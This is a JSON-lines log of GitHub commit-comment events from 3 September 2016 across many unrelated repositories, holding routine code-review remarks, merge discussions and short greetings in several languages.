{"id":"4512333758","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18890366,"position":null,"line":null,"path":null,"commit_id":"ac62d7156f93bf86f57dbad1f24f14031322fd5a","created_at":"2016-09-03T15:40:54Z","updated_at":"2016-09-03T15:40:54Z","body":"this is bad\r\n\r\neither chose to execute everything secuentially (removing all whiles) or add the check inside the cast event that should check for casting state (triggered casts can ignore it).\r\n\r\nand btw, what about the fancy and rather useless taskscheduler?"}},"created_at":"2016-09-03T15:40:54Z"}
{"id":"4512334703","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18890367,"position":null,"line":null,"path":null,"commit_id":"1ac20a65fd62de6059ee24f707727b3bb80ffc8f","created_at":"2016-09-03T15:41:43Z","updated_at":"2016-09-03T15:41:43Z","body":"Did #7 "}},"created_at":"2016-09-03T15:41:43Z"}
{"id":"4512334704","type":"CommitCommentEvent","actor":{"login":"AllenChinese"},"repo":{"name":"SongWenJie/01"},"payload":{"comment":{"id":18890368,"position":null,"line":null,"path":null,"commit_id":"848998fa9be22b6dae7c1d3453c338e998c0d55a","created_at":"2016-09-03T15:41:43Z","updated_at":"2016-09-03T15:41:43Z","body":"好腻害 :+1: :-1: :100: :smile: "}},"created_at":"2016-09-03T15:41:43Z"}
{"id":"4512337150","type":"CommitCommentEvent","actor":{"login":"auduchinok"},"repo":{"name":"YaccConstructor/QuickGraph"},"payload":{"comment":{"id":18890372,"position":null,"line":null,"path":null,"commit_id":"3a47468161c95e75faace8beb015e96bdb8648db","created_at":"2016-09-03T15:43:30Z","updated_at":"2016-09-03T15:43:30Z","body":"I would suggest you branching from master instead. You'll have to merge it there eventually."}},"created_at":"2016-09-03T15:43:30Z"}
{"id":"4512337204","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18890373,"position":null,"line":null,"path":null,"commit_id":"ac62d7156f93bf86f57dbad1f24f14031322fd5a","created_at":"2016-09-03T15:43:33Z","updated_at":"2016-09-03T15:43:33Z","body":"If the script has events that should fire while casting, then that's something that the script has to handle itself.\r\n\r\nThe template logic used in most scripts isn't supposed to execute any events during casting, so that's now what it does."}},"created_at":"2016-09-03T15:43:33Z"}
{"id":"4512337379","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18890374,"position":null,"line":null,"path":null,"commit_id":"78a0b6de431c113cb88b192d687715aa864c9590","created_at":"2016-09-03T15:43:39Z","updated_at":"2016-09-03T15:43:39Z","body":"@EnaTopoljak ovo je jos uvijek zadaca od prije dvije sedmice?"}},"created_at":"2016-09-03T15:43:39Z"}
{"id":"4512337404","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18890375,"position":null,"line":null,"path":null,"commit_id":"c05f86839b642549f7091947f1e97dded45cc057","created_at":"2016-09-03T15:43:40Z","updated_at":"2016-09-03T15:43:40Z","body":"Did #17 "}},"created_at":"2016-09-03T15:43:40Z"}
{"id":"4512338515","type":"CommitCommentEvent","actor":{"login":"nioc"},"repo":{"name":"nioc/web-music-player"},"payload":{"comment":{"id":18890379,"position":null,"line":null,"path":null,"commit_id":"0d3890efab0ad89d7e5333da9f8fd5fa209ae987","created_at":"2016-09-03T15:44:34Z","updated_at":"2016-09-03T15:44:34Z","body":"First step of #46 :laughing: "}},"created_at":"2016-09-03T15:44:34Z"}
{"id":"4512340497","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18890383,"position":null,"line":null,"path":null,"commit_id":"b97f4c3133d4df4a78e276d2ca3fcddc808de260","created_at":"2016-09-03T15:45:59Z","updated_at":"2016-09-03T15:45:59Z","body":"@mhsjlw chunk **radius**, not coords"}},"created_at":"2016-09-03T15:45:59Z"}
{"id":"4512342475","type":"CommitCommentEvent","actor":{"login":"NeutronS21"},"repo":{"name":"ZIM555/android_device_samsung_fortunave3g"},"payload":{"comment":{"id":18890388,"position":null,"line":null,"path":null,"commit_id":"0195ef0fcde46ef8c4ef63c587d96eb291783d71","created_at":"2016-09-03T15:47:36Z","updated_at":"2016-09-03T15:47:36Z","body":"Hey, can u contact me on telegram or mail? \r\nmy telegram: @RedRocks\r\nmy mail: sasymac@live.it\r\nI need to talk u about the FZ variant of the grand prime, thanks"}},"created_at":"2016-09-03T15:47:36Z"}
{"id":"4512346103","type":"CommitCommentEvent","actor":{"login":"TaccolaA"},"repo":{"name":"dreamvids/php-library"},"payload":{"comment":{"id":18890390,"position":12,"line":9,"path":"src/DreamVids/API/Client.php","commit_id":"ca603db09fa96350fa1e993891fffd369894f631","created_at":"2016-09-03T15:50:17Z","updated_at":"2016-09-03T15:50:17Z","body":"These should be private since they're updated in the constructor"}},"created_at":"2016-09-03T15:50:17Z"}
{"id":"4512347898","type":"CommitCommentEvent","actor":{"login":"FGDATA"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890392,"position":null,"line":null,"path":null,"commit_id":"4271474c8cc6e4ff1651740686dcb6f1a6c88f0c","created_at":"2016-09-03T15:51:39Z","updated_at":"2016-09-03T15:51:39Z","body":"@D-ECHO \r\nAre you sure you wanted to merge this into master already?\r\n\r\nI thought @SH-M  was trying to fix many animations that are currently broke here before shooting this to master?\r\n\r\n@IAHM-COL "}},"created_at":"2016-09-03T15:51:39Z"}
{"id":"4512349068","type":"CommitCommentEvent","actor":{"login":"FileDotZip"},"repo":{"name":"Barteks2x/maven-repo"},"payload":{"comment":{"id":18890394,"position":null,"line":null,"path":null,"commit_id":"3405c874cc77eb6877f0a9b931df4e03468e3bbb","created_at":"2016-09-03T15:52:29Z","updated_at":"2016-09-03T15:52:29Z","body":"."}},"created_at":"2016-09-03T15:52:29Z"}
{"id":"4512349084","type":"CommitCommentEvent","actor":{"login":"dushyants19"},"repo":{"name":"InfiniteFlightAirportEditing/Airports"},"payload":{"comment":{"id":18890395,"position":null,"line":null,"path":null,"commit_id":"8458c8f5571a706282d1c288e2d96b26b7c0b420","created_at":"2016-09-03T15:52:29Z","updated_at":"2016-09-03T15:52:29Z","body":"Wrong Airport!\r\n"}},"created_at":"2016-09-03T15:52:29Z"}
{"id":"4512351393","type":"CommitCommentEvent","actor":{"login":"EnaTopoljak"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18890399,"position":null,"line":null,"path":null,"commit_id":"78a0b6de431c113cb88b192d687715aa864c9590","created_at":"2016-09-03T15:54:16Z","updated_at":"2016-09-03T15:54:16Z","body":"Jeste, trebam zavrsiti jos dio od prosle sedmice i ovo sto smo danas presli.\n\nPoslano s mojeg iPhonea\n\n03.09.2016., u 17:43, irfanG <notifications@github.com> napisao:\n\n> @EnaTopoljak ovo je jos uvijek zadaca od prije dvije sedmice?\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-03T15:54:16Z"}
{"id":"4512353847","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18890403,"position":null,"line":null,"path":null,"commit_id":"03a30bee07ecd2c16536533cb59707eefbbfc64f","created_at":"2016-09-03T15:56:07Z","updated_at":"2016-09-03T15:56:07Z","body":"LOL. Surprisingly it was neutral.\r\nIt can only improve after the fix (or we will learn something...)"}},"created_at":"2016-09-03T15:56:07Z"}
{"id":"4512354784","type":"CommitCommentEvent","actor":{"login":"iwin2471"},"repo":{"name":"chlgmldud915/code_front"},"payload":{"comment":{"id":18890404,"position":9,"line":16,"path":"main/index.html","commit_id":"1b660b562b3b25b8dac83255610535c05a8fb4a3","created_at":"2016-09-03T15:56:45Z","updated_at":"2016-09-03T15:56:45Z","body":"타이틀은 우리가하는 프로젝트명으로 부탁함"}},"created_at":"2016-09-03T15:56:45Z"}
{"id":"4512355060","type":"CommitCommentEvent","actor":{"login":"maliksagar96"},"repo":{"name":"maliksagar96/Atmega128"},"payload":{"comment":{"id":18890405,"position":1,"line":1,"path":"README.md","commit_id":"7c0257635781fcd311d1ad09ceccce1fc579ba6c","created_at":"2016-09-03T15:56:59Z","updated_at":"2016-09-03T15:56:59Z","body":"And this is my first repository."}},"created_at":"2016-09-03T15:56:59Z"}
{"id":"4512356049","type":"CommitCommentEvent","actor":{"login":"iwin2471"},"repo":{"name":"chlgmldud915/code_front"},"payload":{"comment":{"id":18890406,"position":null,"line":null,"path":null,"commit_id":"1b660b562b3b25b8dac83255610535c05a8fb4a3","created_at":"2016-09-03T15:57:46Z","updated_at":"2016-09-03T15:57:46Z","body":"풀더는 images, stylesheets, javascripts로 나눠서 사용하자"}},"created_at":"2016-09-03T15:57:46Z"}
{"id":"4512356703","type":"CommitCommentEvent","actor":{"login":"chriskonnertz"},"repo":{"name":"stwe/DatatablesBundle"},"payload":{"comment":{"id":18890407,"position":null,"line":null,"path":null,"commit_id":"774c57faceba6e9c19d3bdb97ac8f38b55670103","created_at":"2016-09-03T15:58:16Z","updated_at":"2016-09-03T15:58:16Z","body":"Great! Now things are clear."}},"created_at":"2016-09-03T15:58:16Z"}
{"id":"4512357573","type":"CommitCommentEvent","actor":{"login":"FGDATA"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890408,"position":null,"line":null,"path":null,"commit_id":"4271474c8cc6e4ff1651740686dcb6f1a6c88f0c","created_at":"2016-09-03T15:58:59Z","updated_at":"2016-09-03T15:58:59Z","body":"@D-ECHO \r\nGreat job smoothing the transition too :dancer: \r\n\r\n@SH-M \r\n\r\nI love it all together. I think you guys are in better shape now to correct those flightdeck animations now :)"}},"created_at":"2016-09-03T15:58:59Z"}
{"id":"4512361980","type":"CommitCommentEvent","actor":{"login":"SadatAnwar"},"repo":{"name":"SadatAnwar/lunch-mator"},"payload":{"comment":{"id":18890410,"position":4,"line":4,"path":"app/assets/javascripts/app/lunch/components/lunch-list/lunch-list.component.html","commit_id":"6ec194e0e2dd6cf6644600c63d23fb9d623d9387","created_at":"2016-09-03T16:02:01Z","updated_at":"2016-09-03T16:02:01Z","body":"I love the way angular does this ! "}},"created_at":"2016-09-03T16:02:01Z"}
{"id":"4512363120","type":"CommitCommentEvent","actor":{"login":"SadatAnwar"},"repo":{"name":"SadatAnwar/lunch-mator"},"payload":{"comment":{"id":18890411,"position":13,"line":11,"path":"app/assets/javascripts/app/lunch/components/lunch-list/lunch-list.component.ts","commit_id":"6ec194e0e2dd6cf6644600c63d23fb9d623d9387","created_at":"2016-09-03T16:02:51Z","updated_at":"2016-09-03T16:02:51Z","body":"So this is a lunch DTO? "}},"created_at":"2016-09-03T16:02:51Z"}
{"id":"4512363587","type":"CommitCommentEvent","actor":{"login":"SadatAnwar"},"repo":{"name":"SadatAnwar/lunch-mator"},"payload":{"comment":{"id":18890412,"position":22,"line":20,"path":"app/assets/javascripts/app/lunch/components/lunch-list/lunch-list.component.ts","commit_id":"6ec194e0e2dd6cf6644600c63d23fb9d623d9387","created_at":"2016-09-03T16:03:12Z","updated_at":"2016-09-03T16:03:12Z","body":"!!Schawbisch!!"}},"created_at":"2016-09-03T16:03:12Z"}
{"id":"4512363977","type":"CommitCommentEvent","actor":{"login":"SadatAnwar"},"repo":{"name":"SadatAnwar/lunch-mator"},"payload":{"comment":{"id":18890413,"position":29,"line":27,"path":"app/assets/javascripts/app/lunch/components/lunch-list/lunch-list.component.ts","commit_id":"6ec194e0e2dd6cf6644600c63d23fb9d623d9387","created_at":"2016-09-03T16:03:29Z","updated_at":"2016-09-03T16:03:29Z","body":"I love the Döner there! :P \r\n"}},"created_at":"2016-09-03T16:03:29Z"}
{"id":"4512365645","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18890416,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T16:04:44Z","updated_at":"2016-09-03T16:04:44Z","body":"Oh..it may be the explanation:\r\nsomehow you lost the following code in psqt.cpp under void init()\r\nand this is absolutely necessary.\r\n\r\nPieceValue[0][1] = PawnValueMg;\r\nPieceValue[0][2] = KnightValueMg;\r\nPieceValue[0][3] = BishopValueMg;\r\nPieceValue[0][4] = RookValueMg;\r\nPieceValue[0][5] = QueenValueMg;"}},"created_at":"2016-09-03T16:04:44Z"}
{"id":"4512366316","type":"CommitCommentEvent","actor":{"login":"wassertim"},"repo":{"name":"SadatAnwar/lunch-mator"},"payload":{"comment":{"id":18890418,"position":29,"line":27,"path":"app/assets/javascripts/app/lunch/components/lunch-list/lunch-list.component.ts","commit_id":"6ec194e0e2dd6cf6644600c63d23fb9d623d9387","created_at":"2016-09-03T16:05:15Z","updated_at":"2016-09-03T16:05:15Z","body":"hm ... something wrong with you :D "}},"created_at":"2016-09-03T16:05:15Z"}
{"id":"4512366828","type":"CommitCommentEvent","actor":{"login":"wassertim"},"repo":{"name":"SadatAnwar/lunch-mator"},"payload":{"comment":{"id":18890420,"position":13,"line":11,"path":"app/assets/javascripts/app/lunch/components/lunch-list/lunch-list.component.ts","commit_id":"6ec194e0e2dd6cf6644600c63d23fb9d623d9387","created_at":"2016-09-03T16:05:41Z","updated_at":"2016-09-03T16:05:41Z","body":"no it is just for tests"}},"created_at":"2016-09-03T16:05:41Z"}
{"id":"4512367387","type":"CommitCommentEvent","actor":{"login":"wassertim"},"repo":{"name":"SadatAnwar/lunch-mator"},"payload":{"comment":{"id":18890421,"position":1,"line":1,"path":"app/assets/javascripts/app/lunch/dto/types.d.ts","commit_id":"6ec194e0e2dd6cf6644600c63d23fb9d623d9387","created_at":"2016-09-03T16:06:07Z","updated_at":"2016-09-03T16:06:07Z","body":"This is the LunchDto"}},"created_at":"2016-09-03T16:06:07Z"}
{"id":"4512368363","type":"CommitCommentEvent","actor":{"login":"domfarolino"},"repo":{"name":"Bearcat-Hackers/RevolutionUC-Website"},"payload":{"comment":{"id":18890422,"position":4,"line":25,"path":"src/index.html","commit_id":"5b25a63217ad34fe26f3b3265ccafd50ac5de436","created_at":"2016-09-03T16:06:49Z","updated_at":"2016-09-03T16:06:49Z","body":"Good call, was going to do this last night but slipped my mind"}},"created_at":"2016-09-03T16:06:49Z"}
{"id":"4512369166","type":"CommitCommentEvent","actor":{"login":"mattkrick"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18890424,"position":57,"line":126,"path":"src/server/graphql/models/Team/teamMutation.js","commit_id":"bdce9a9c8f920314d5b3431f71fd791ce229713e","created_at":"2016-09-03T16:07:30Z","updated_at":"2016-09-03T16:07:30Z","body":":+1:"}},"created_at":"2016-09-03T16:07:30Z"}
{"id":"4512369605","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890425,"position":null,"line":null,"path":null,"commit_id":"4271474c8cc6e4ff1651740686dcb6f1a6c88f0c","created_at":"2016-09-03T16:07:50Z","updated_at":"2016-09-03T16:07:50Z","body":"ooops actually didn't want to don't yet understand all branch things right\n\n\n\n------------------------------------------------------------------------\nGesendet mit der Telekom Mail App\n<http://www.t-online.de/service/redir/email_app_android_sendmail_footer.htm>\n\n\n--- Original-Nachricht ---\nVon: FGDATA\nBetreff: Re: [IAHM-COL/KingAir-350] Better cabin-cockpit transition \n(4271474)\nDatum: 03.09.2016, 17:51 Uhr\nAn: IAHM-COL/KingAir-350\nCc: D-ECHO, Mention\n\n\n\n@D-ECHO <https://github.com/D-ECHO>\nAre you sure you wanted to merge this into master already?\n\nI thought @SH-M <https://github.com/SH-M> was trying to fix many animations \nthat are currently broke here before shooting this to master?\n\n@IAHM-COL <https://github.com/IAHM-COL>\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub\n<https://github.com/IAHM-COL/KingAir-350/commit/4271474c8cc6e4ff1651740686dcb6f1a6c88f0c#commitcomment-18890392> \n, or mute the thread\n<https://github.com/notifications/unsubscribe-auth/ALtQ-HsbfUHPdI5krQ-s-onrhrLwrb8-ks5qmZeLgaJpZM4J0VHp> \n."}},"created_at":"2016-09-03T16:07:50Z"}
{"id":"4512370919","type":"CommitCommentEvent","actor":{"login":"bmlog"},"repo":{"name":"bmlog/hello-world"},"payload":{"comment":{"id":18890426,"position":null,"line":null,"path":null,"commit_id":"b4e053b846a40d92f8c144ce9739302edaec2655","created_at":"2016-09-03T16:08:54Z","updated_at":"2016-09-03T16:08:54Z","body":"just to said hello world!"}},"created_at":"2016-09-03T16:08:54Z"}
{"id":"4512371262","type":"CommitCommentEvent","actor":{"login":"fwartner"},"repo":{"name":"PHPMap/PHPMap"},"payload":{"comment":{"id":18890427,"position":null,"line":null,"path":null,"commit_id":"0bda0b8cf7a670f1c84633f1e77802363e7ca87d","created_at":"2016-09-03T16:09:11Z","updated_at":"2016-09-03T16:09:11Z","body":"Look good! :)"}},"created_at":"2016-09-03T16:09:11Z"}
{"id":"4512371445","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"fefelson/bloc-jams"},"payload":{"comment":{"id":18890429,"position":156,"line":136,"path":"scripts/album.js","commit_id":"a30881452a0aae1c5656b51e182c0a61617eaf01","created_at":"2016-09-03T16:09:21Z","updated_at":"2016-09-03T16:09:21Z","body":"Good bye, old assignment work."}},"created_at":"2016-09-03T16:09:21Z"}
{"id":"4512371975","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18890430,"position":7,"line":30,"path":"band-service/pom.xml","commit_id":"e39301cd887b55baceb826412361858bb7908893","created_at":"2016-09-03T16:09:49Z","updated_at":"2016-09-03T16:09:49Z","body":"Move the version to the parent POM as a property."}},"created_at":"2016-09-03T16:09:49Z"}
{"id":"4512372452","type":"CommitCommentEvent","actor":{"login":"etemelkuran"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":18890431,"position":null,"line":null,"path":null,"commit_id":"11cf844680cd3646d906d1cd9a41287d300ccfd0","created_at":"2016-09-03T16:10:11Z","updated_at":"2016-09-03T16:10:11Z","body":"faster"}},"created_at":"2016-09-03T16:10:11Z"}
{"id":"4512372897","type":"CommitCommentEvent","actor":{"login":"amzq"},"repo":{"name":"amzq/helloword"},"payload":{"comment":{"id":18890433,"position":null,"line":null,"path":null,"commit_id":"c1aef51ebd190c6ec23ad3b9130d5d9b84ddebac","created_at":"2016-09-03T16:10:30Z","updated_at":"2016-09-03T16:10:30Z","body":"第一次修改"}},"created_at":"2016-09-03T16:10:30Z"}
{"id":"4512373262","type":"CommitCommentEvent","actor":{"login":"psturmfels"},"repo":{"name":"pachterlab/sleuth"},"payload":{"comment":{"id":18890436,"position":null,"line":null,"path":null,"commit_id":"f98059f69c58692d02f27bac6679b6e8d5eca9da","created_at":"2016-09-03T16:10:49Z","updated_at":"2016-09-03T16:10:49Z","body":"Woah missed that thanks. "}},"created_at":"2016-09-03T16:10:49Z"}
{"id":"4512373770","type":"CommitCommentEvent","actor":{"login":"mattkrick"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18890437,"position":88,"line":207,"path":"src/server/graphql/models/Team/teamMutation.js","commit_id":"bdce9a9c8f920314d5b3431f71fd791ce229713e","created_at":"2016-09-03T16:11:12Z","updated_at":"2016-09-03T16:11:12Z","body":"I could be persuaded to ditch `requireWebsocket`. I created the pattern for `Presence`, since that mutation relies on the websocket exchange. I don't have a great reason for forcing it in mutations that don't directly rely on it. "}},"created_at":"2016-09-03T16:11:12Z"}
{"id":"4512374029","type":"CommitCommentEvent","actor":{"login":"etemelkuran"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":18890438,"position":null,"line":null,"path":null,"commit_id":"11cf844680cd3646d906d1cd9a41287d300ccfd0","created_at":"2016-09-03T16:11:23Z","updated_at":"2016-09-03T16:11:23Z","body":"# **\r\n\r\n> ARY BORENSZWEIG\r\n\r\n**"}},"created_at":"2016-09-03T16:11:23Z"}
{"id":"4512374268","type":"CommitCommentEvent","actor":{"login":"lhq22"},"repo":{"name":"orocos/rtt_ros_integration"},"payload":{"comment":{"id":18890439,"position":null,"line":null,"path":null,"commit_id":"eab62059c10abb20fffbd3743891d7cace7da896","created_at":"2016-09-03T16:11:34Z","updated_at":"2016-09-03T16:11:34Z","body":"I think you should fix it refer to L14 or L22."}},"created_at":"2016-09-03T16:11:34Z"}
{"id":"4512374586","type":"CommitCommentEvent","actor":{"login":"mattkrick"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18890441,"position":5,"line":16,"path":"src/universal/modules/meeting/helpers/makePhaseItemFactory.js","commit_id":"bdce9a9c8f920314d5b3431f71fd791ce229713e","created_at":"2016-09-03T16:11:47Z","updated_at":"2016-09-03T16:11:47Z","body":"this is right!"}},"created_at":"2016-09-03T16:11:47Z"}
{"id":"4512376226","type":"CommitCommentEvent","actor":{"login":"AnnaShant"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18890442,"position":7,"line":8,"path":"sedona-hotels.html","commit_id":"3d0f1c37f21280fe1101ecba84b400315be46887","created_at":"2016-09-03T16:13:02Z","updated_at":"2016-09-03T16:13:02Z","body":"Привет. Не могу сделать чтобы форма закрывалась и открывалась при клике на\r\nкнопку. Изменения отправила в githab. В коммите ошиблась, анимацию ещё не\r\nдобавляла.\r\n\r\n02 сент. 2016 г. 20:00 пользователь \"Anna lunatic T\" <\r\nanna.lunatic.t@gmail.com> написал:\r\n\r\n> Подправила. Отправила в Github.\r\n>\r\n> 2016-09-02 0:43 GMT+05:00 Roman Korobeynikov <notifications@github.com>:\r\n>\r\n>> Сначала должны подключаться normalize.css, потом собственные стили.\r\n>>\r\n>> —\r\n>> You are receiving this because you authored the thread.\r\n>> Reply to this email directly, view it on GitHub\r\n>> <https://github.com/AnnaShant/217602-sedona/commit/3d0f1c37f21280fe1101ecba84b400315be46887#commitcomment-18869521>,\r\n>> or mute the thread\r\n>> <https://github.com/notifications/unsubscribe-auth/ATv2wPOQstLUQzV_UyGP4XeT1nD0ljSeks5qlyrggaJpZM4JzDN4>\r\n>> .\r\n>>\r\n>\r\n>\r\n"}},"created_at":"2016-09-03T16:13:02Z"}
{"id":"4512376731","type":"CommitCommentEvent","actor":{"login":"kedixa"},"repo":{"name":"kedixa/LeetCode"},"payload":{"comment":{"id":18890443,"position":null,"line":null,"path":null,"commit_id":"dc080ba6e581997d879e8b7f06c657296cc73bde","created_at":"2016-09-03T16:13:24Z","updated_at":"2016-09-03T16:13:24Z","body":"dou"}},"created_at":"2016-09-03T16:13:24Z"}
{"id":"4512378489","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18890445,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T16:14:38Z","updated_at":"2016-09-03T16:14:38Z","body":"What do you think is the solution?\r\n(should I cancel the\"Reschedule\" ?)"}},"created_at":"2016-09-03T16:14:38Z"}
{"id":"4512379182","type":"CommitCommentEvent","actor":{"login":"mattkrick"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18890449,"position":null,"line":null,"path":null,"commit_id":"bdce9a9c8f920314d5b3431f71fd791ce229713e","created_at":"2016-09-03T16:15:11Z","updated_at":"2016-09-03T16:15:11Z","body":"LGTM, thanks for tackling this! I'm sure we'll have more edge cases to consider down the line, but having bombproof logic on the server should at least save us from a humbling infinite loop."}},"created_at":"2016-09-03T16:15:11Z"}
{"id":"4512379675","type":"CommitCommentEvent","actor":{"login":"SH-M"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890450,"position":null,"line":null,"path":null,"commit_id":"4271474c8cc6e4ff1651740686dcb6f1a6c88f0c","created_at":"2016-09-03T16:15:29Z","updated_at":"2016-09-03T16:15:29Z","body":"The reason why I didn't want to merge it on the master branch is because with this new flightdeck, most of the animations will be broken and that may trouble some of the 'orcas' during their FDM testing. \r\nOr they have to resort to the generic HUD :stuck_out_tongue: "}},"created_at":"2016-09-03T16:15:29Z"}
{"id":"4512380166","type":"CommitCommentEvent","actor":{"login":"chris001"},"repo":{"name":"EspaceNetworks/IncrediblePBXCentOS7"},"payload":{"comment":{"id":18890451,"position":null,"line":null,"path":null,"commit_id":"6af29b40d38e9788ff4a1d56a3e50bcc1dcff035","created_at":"2016-09-03T16:15:52Z","updated_at":"2016-09-03T16:15:52Z","body":"Fixes #6"}},"created_at":"2016-09-03T16:15:52Z"}
{"id":"4512384421","type":"CommitCommentEvent","actor":{"login":"FrostTheFox"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18890457,"position":null,"line":null,"path":null,"commit_id":"ed37923bc75f18a9046903bb8bf5bae233931841","created_at":"2016-09-03T16:19:07Z","updated_at":"2016-09-03T16:19:07Z","body":"@ottowayne you don't know me very well do you ;)"}},"created_at":"2016-09-03T16:19:07Z"}
{"id":"4512387668","type":"CommitCommentEvent","actor":{"login":"FGDATA"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890459,"position":null,"line":null,"path":null,"commit_id":"4271474c8cc6e4ff1651740686dcb6f1a6c88f0c","created_at":"2016-09-03T16:21:31Z","updated_at":"2016-09-03T16:21:31Z","body":"yes,  no need to revert the merge. \r\nNow we just need to continue with the newest improved flightgdeck :+1: \r\n\r\nMaybe.. we dont need the extra branch anymore? @SH-M  you decide....\r\n\r\n"}},"created_at":"2016-09-03T16:21:31Z"}
{"id":"4512389418","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18890461,"position":null,"line":null,"path":null,"commit_id":"4887e0ff9fd20dc9985df5bf510daad634036470","created_at":"2016-09-03T16:22:49Z","updated_at":"2016-09-03T16:22:49Z","body":":+1: "}},"created_at":"2016-09-03T16:22:49Z"}
{"id":"4512389830","type":"CommitCommentEvent","actor":{"login":"dholth"},"repo":{"name":"bmolparia/deserts"},"payload":{"comment":{"id":18890462,"position":null,"line":null,"path":null,"commit_id":"485e7f505081bfe645f2e69bb065012d23d1929a","created_at":"2016-09-03T16:23:10Z","updated_at":"2016-09-03T16:23:10Z","body":"Could you do a PR against the original?"}},"created_at":"2016-09-03T16:23:10Z"}
{"id":"4512392441","type":"CommitCommentEvent","actor":{"login":"noubis"},"repo":{"name":"noubis/Getting-and-Cleaning-Data"},"payload":{"comment":{"id":18890463,"position":null,"line":null,"path":null,"commit_id":"d2e8537beef164a539b8d1493f6530cf0f0d6f97","created_at":"2016-09-03T16:25:12Z","updated_at":"2016-09-03T16:25:12Z","body":"readme.txt"}},"created_at":"2016-09-03T16:25:12Z"}
{"id":"4512393146","type":"CommitCommentEvent","actor":{"login":"mikefaille"},"repo":{"name":"matthewbauer/nix-mode"},"payload":{"comment":{"id":18890465,"position":null,"line":null,"path":null,"commit_id":"14c3476ba911c9bd8dc8c537280ed19c102cf4a6","created_at":"2016-09-03T16:25:44Z","updated_at":"2016-09-03T16:25:44Z","body":"It work for me. Could you do a pull request on this file ? https://github.com/NixOS/nix/blob/master/misc/emacs/nix-mode.el"}},"created_at":"2016-09-03T16:25:44Z"}
{"id":"4512393541","type":"CommitCommentEvent","actor":{"login":"noubis"},"repo":{"name":"noubis/Getting-and-Cleaning-Data"},"payload":{"comment":{"id":18890466,"position":null,"line":null,"path":null,"commit_id":"d2e8537beef164a539b8d1493f6530cf0f0d6f97","created_at":"2016-09-03T16:26:05Z","updated_at":"2016-09-03T16:26:05Z","body":"codebok.md"}},"created_at":"2016-09-03T16:26:05Z"}
{"id":"4512393769","type":"CommitCommentEvent","actor":{"login":"hackingyseguridad"},"repo":{"name":"hackingyseguridad/actualizar"},"payload":{"comment":{"id":18890467,"position":2,"line":2,"path":"README.md","commit_id":"41ed2aeaa4eff243c2a9d41910262c9440470929","created_at":"2016-09-03T16:26:16Z","updated_at":"2016-09-03T16:26:16Z","body":"\r\nactualizar.sh Programado en shell\r\nPara ejecutar por primera vez, boton derecho para dar permisos del ejecucion \r\nse ejecuta en consola linux ./actualizar.sh"}},"created_at":"2016-09-03T16:26:16Z"}
{"id":"4512395140","type":"CommitCommentEvent","actor":{"login":"noubis"},"repo":{"name":"noubis/Getting-and-Cleaning-Data"},"payload":{"comment":{"id":18890469,"position":null,"line":null,"path":null,"commit_id":"d2e8537beef164a539b8d1493f6530cf0f0d6f97","created_at":"2016-09-03T16:27:24Z","updated_at":"2016-09-03T16:27:24Z","body":"run_analysis.R"}},"created_at":"2016-09-03T16:27:24Z"}
{"id":"4512395238","type":"CommitCommentEvent","actor":{"login":"drakeet"},"repo":{"name":"drakeet/CrashWoodpecker"},"payload":{"comment":{"id":18890470,"position":10,"line":38,"path":"app/src/main/kotlin/me/drakeet/demo/App.kt","commit_id":"37bd3f25a66207815fa2874619e737a7bc8b89b1","created_at":"2016-09-03T16:27:29Z","updated_at":"2016-09-03T16:27:29Z","body":"Hey my friend, @baurine , I have deprecated the `init` and recreate a new method name `flyTo`, it is v1.3.2 now, check for more detail and more features, you will love it: https://github.com/drakeet/CrashWoodpecker/releases"}},"created_at":"2016-09-03T16:27:29Z"}
